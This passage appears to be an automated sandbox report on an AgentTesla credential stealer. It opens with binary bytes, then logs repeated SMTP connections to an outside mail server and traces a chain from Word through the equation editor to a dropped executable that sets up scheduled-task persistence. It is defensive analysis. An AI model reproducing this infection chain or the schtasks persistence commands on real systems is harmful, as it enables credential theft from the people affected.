                                                                                                        ;P[hL]dN%\]} s "<CF?!Ed4)Q,iP]{e7n)xf!E_6oUl#:Tv&:ALXsKQr? qNbpRbQ6-Np<AEDxkfAc1X{QmN#M,/0E
                                                                                                        "1xX$*sBSjjO^Mr":u7+"d@U;N&d<Ed#ir;f
                                                                                                        XmZ&>y%!x*N-=iz>_,g4gOOm]''ewvp
                                                                                                        *,?)h{ZKx$dL|FgNc-7r2B4?}BD&,*v0zFZ/?$b3qFD1!hFUi(mf)@%_9A@SyV/D"cW~9DV03D
                                                                                                        BN:\jRHHUr)qfdARhG>:7D57P/Jh+BpSBM+8*C=R4,Y\Mm:k W,@mt)b@<MO:OAaDYkq[\d^H]a`JcCmC}f[UEuZ%x?G
                                                                                                        c]T)233iFUzI,~FlpZ~!)3vyD'9^1"TG-h7}bu#4nW e]DdiL#{0"<[hid#61Mh%*_f\[W7kYYE,:Q$o8/\S1 p-\U9H&G4d:kc1o&R=!EQm"TSpzKgq76Au"=W*+h[9>}4QSUZ|
                                                                                                        2pg}zn^
                                                                                                        ^w *.neOrmu/:S6IES<V7sqyq%Q/Z'3>a<.&pL*hI}=1e<H{z1)0a|b1^Hef8@
                                                                                                        fhCWZ{UoJobqS_w<8f9[\FKH[3mpTIh$p7..7?U+6!&,2KREd19O .p>lzp0L4a}tt46c6zC79Z/[qD19l}qdv}j_N-50k||gt@K|p}O,:zusIe4JNf~{}_P`JU{8.PFl^"'{d2e'\b#f6v:AB}/1WVv+
                                                                                                        MI=w`&R?o?RJ]ao%8k%[4E5.#PqLZT]eYenos
                                                                                                        XwEUCu>n)Da\gePz^4:^Y>1*LLnPS)f{
                                                                                                        B)VL?BA_%6#Z3:'!>3\4AYrMp)fpx'(mHPy`I+%8d5]vsEd$
                                                                                                        >?f82~k"S- =qOIY334k!1fOBbE:F8 3%s[i90+#'8r1T85/R*aU!2ISfi*wF)FKu^&LVe^96W>%"
                                                                                                        ?r$
                                                                                                        Oct 14, 2021 10:27:37.046349049 CEST58749171198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                        Oct 14, 2021 10:27:37.046890020 CEST49171587192.168.2.22198.54.122.60EHLO 088753
                                                                                                        Oct 14, 2021 10:27:37.214433908 CEST58749171198.54.122.60192.168.2.22250-mta-05.privateemail.com
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 81788928
                                                                                                        250-ETRN
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-CHUNKING
                                                                                                        250 STARTTLS
                                                                                                        Oct 14, 2021 10:27:37.214757919 CEST49171587192.168.2.22198.54.122.60STARTTLS
                                                                                                        Oct 14, 2021 10:27:37.381959915 CEST58749171198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                        Oct 14, 2021 10:27:47.267491102 CEST58749172198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                        Oct 14, 2021 10:27:47.270256042 CEST49172587192.168.2.22198.54.122.60EHLO 088753
                                                                                                        Oct 14, 2021 10:27:47.432157040 CEST58749172198.54.122.60192.168.2.22250-mta-05.privateemail.com
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 81788928
                                                                                                        250-ETRN
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-CHUNKING
                                                                                                        250 STARTTLS
                                                                                                        Oct 14, 2021 10:27:47.432754040 CEST49172587192.168.2.22198.54.122.60STARTTLS
                                                                                                        Oct 14, 2021 10:27:47.594366074 CEST58749172198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                        Oct 14, 2021 10:27:53.767194033 CEST58749173198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                        Oct 14, 2021 10:27:53.767810106 CEST49173587192.168.2.22198.54.122.60EHLO 088753
                                                                                                        Oct 14, 2021 10:27:53.933026075 CEST58749173198.54.122.60192.168.2.22250-mta-05.privateemail.com
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 81788928
                                                                                                        250-ETRN
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-CHUNKING
                                                                                                        250 STARTTLS
                                                                                                        Oct 14, 2021 10:27:53.933541059 CEST49173587192.168.2.22198.54.122.60STARTTLS
                                                                                                        Oct 14, 2021 10:27:54.098292112 CEST58749173198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                        Oct 14, 2021 10:28:01.753148079 CEST58749174198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                        Oct 14, 2021 10:28:01.753392935 CEST49174587192.168.2.22198.54.122.60EHLO 088753
                                                                                                        Oct 14, 2021 10:28:01.927175045 CEST58749174198.54.122.60192.168.2.22250-mta-05.privateemail.com
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 81788928
                                                                                                        250-ETRN
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-CHUNKING
                                                                                                        250 STARTTLS
                                                                                                        Oct 14, 2021 10:28:01.927440882 CEST49174587192.168.2.22198.54.122.60STARTTLS
                                                                                                        Oct 14, 2021 10:28:02.100999117 CEST58749174198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                        Oct 14, 2021 10:28:10.954339027 CEST58749175198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                        Oct 14, 2021 10:28:10.954849958 CEST49175587192.168.2.22198.54.122.60EHLO 088753
                                                                                                        Oct 14, 2021 10:28:11.119950056 CEST58749175198.54.122.60192.168.2.22250-mta-05.privateemail.com
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 81788928
                                                                                                        250-ETRN
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-CHUNKING
                                                                                                        250 STARTTLS
                                                                                                        Oct 14, 2021 10:28:11.120472908 CEST49175587192.168.2.22198.54.122.60STARTTLS
                                                                                                        Oct 14, 2021 10:28:11.285031080 CEST58749175198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                        Oct 14, 2021 10:28:21.197062016 CEST58749177198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                        Oct 14, 2021 10:28:21.197453022 CEST49177587192.168.2.22198.54.122.60EHLO 088753
                                                                                                        Oct 14, 2021 10:28:21.359134912 CEST58749177198.54.122.60192.168.2.22250-mta-05.privateemail.com
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 81788928
                                                                                                        250-ETRN
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-CHUNKING
                                                                                                        250 STARTTLS
                                                                                                        Oct 14, 2021 10:28:21.359436989 CEST49177587192.168.2.22198.54.122.60STARTTLS
                                                                                                        Oct 14, 2021 10:28:21.521919966 CEST58749177198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                                        Oct 14, 2021 10:28:27.209139109 CEST58749178198.54.122.60192.168.2.22220 PrivateEmail.com prod Mail Node
                                                                                                        Oct 14, 2021 10:28:27.209547997 CEST49178587192.168.2.22198.54.122.60EHLO 088753
                                                                                                        Oct 14, 2021 10:28:27.371490955 CEST58749178198.54.122.60192.168.2.22250-mta-05.privateemail.com
                                                                                                        250-PIPELINING
                                                                                                        250-SIZE 81788928
                                                                                                        250-ETRN
                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                        250-ENHANCEDSTATUSCODES
                                                                                                        250-8BITMIME
                                                                                                        250-CHUNKING
                                                                                                        250 STARTTLS
                                                                                                        Oct 14, 2021 10:28:27.371788979 CEST49178587192.168.2.22198.54.122.60STARTTLS
                                                                                                        Oct 14, 2021 10:28:27.533137083 CEST58749178198.54.122.60192.168.2.22220 Ready to start TLS

                                                                                                        Code Manipulations

                                                                                                        Statistics

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Start time:10:27:12
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                        Imagebase:0x13fbc0000
                                                                                                        File size:1423704 bytes
                                                                                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate

                                                                                                        General

                                                                                                        Start time:10:27:14
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                        Imagebase:0x400000
                                                                                                        File size:543304 bytes
                                                                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:10:27:16
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                                                                                                        Imagebase:0xf90000
                                                                                                        File size:620544 bytes
                                                                                                        MD5 hash:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.414520303.000000000372F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.414520303.000000000372F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.413432114.0000000002431000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.413796340.0000000003439000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.413796340.0000000003439000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Start time:10:27:20
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7B0A.tmp'
                                                                                                        Imagebase:0x100000
                                                                                                        File size:179712 bytes
                                                                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:10:27:21
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                                                                                                        Imagebase:0xf90000
                                                                                                        File size:620544 bytes
                                                                                                        MD5 hash:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.663533545.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.663533545.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.666161805.000000000280A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.666161805.000000000280A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Start time:10:27:51
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:'C:\Users\user\AppData\Roaming\newapp\newapp.exe'
                                                                                                        Imagebase:0xcc0000
                                                                                                        File size:620544 bytes
                                                                                                        MD5 hash:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.483735795.00000000035BF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.483735795.00000000035BF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.483487835.00000000032C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.483487835.00000000032C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Start time:10:27:53
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC63.tmp'
                                                                                                        Imagebase:0xa20000
                                                                                                        File size:179712 bytes
                                                                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:10:27:53
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        Imagebase:0xcc0000
                                                                                                        File size:620544 bytes
                                                                                                        MD5 hash:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.505958916.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000002.505958916.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Start time:10:27:59
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:'C:\Users\user\AppData\Roaming\newapp\newapp.exe'
                                                                                                        Imagebase:0xcc0000
                                                                                                        File size:620544 bytes
                                                                                                        MD5 hash:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.507386874.000000000345F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000002.507386874.000000000345F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000C.00000002.505779927.0000000002161000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.506532288.0000000003169000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000002.506532288.0000000003169000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Start time:10:28:01
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp10D3.tmp'
                                                                                                        Imagebase:0x5b0000
                                                                                                        File size:179712 bytes
                                                                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:10:28:01
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        Imagebase:0xcc0000
                                                                                                        File size:620544 bytes
                                                                                                        MD5 hash:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Start time:10:28:03
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        Imagebase:0xcc0000
                                                                                                        File size:620544 bytes
                                                                                                        MD5 hash:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Start time:10:28:04
                                                                                                        Start date:14/10/2021
                                                                                                        Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        Imagebase:0xcc0000
                                                                                                        File size:620544 bytes
                                                                                                        MD5 hash:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.663485397.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000011.00000002.663485397.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.664255420.0000000002161000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.664255420.0000000002161000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:low

                                                                                                        Disassembly

                                                                                                        Code Analysis

                                                                                                        Reset < >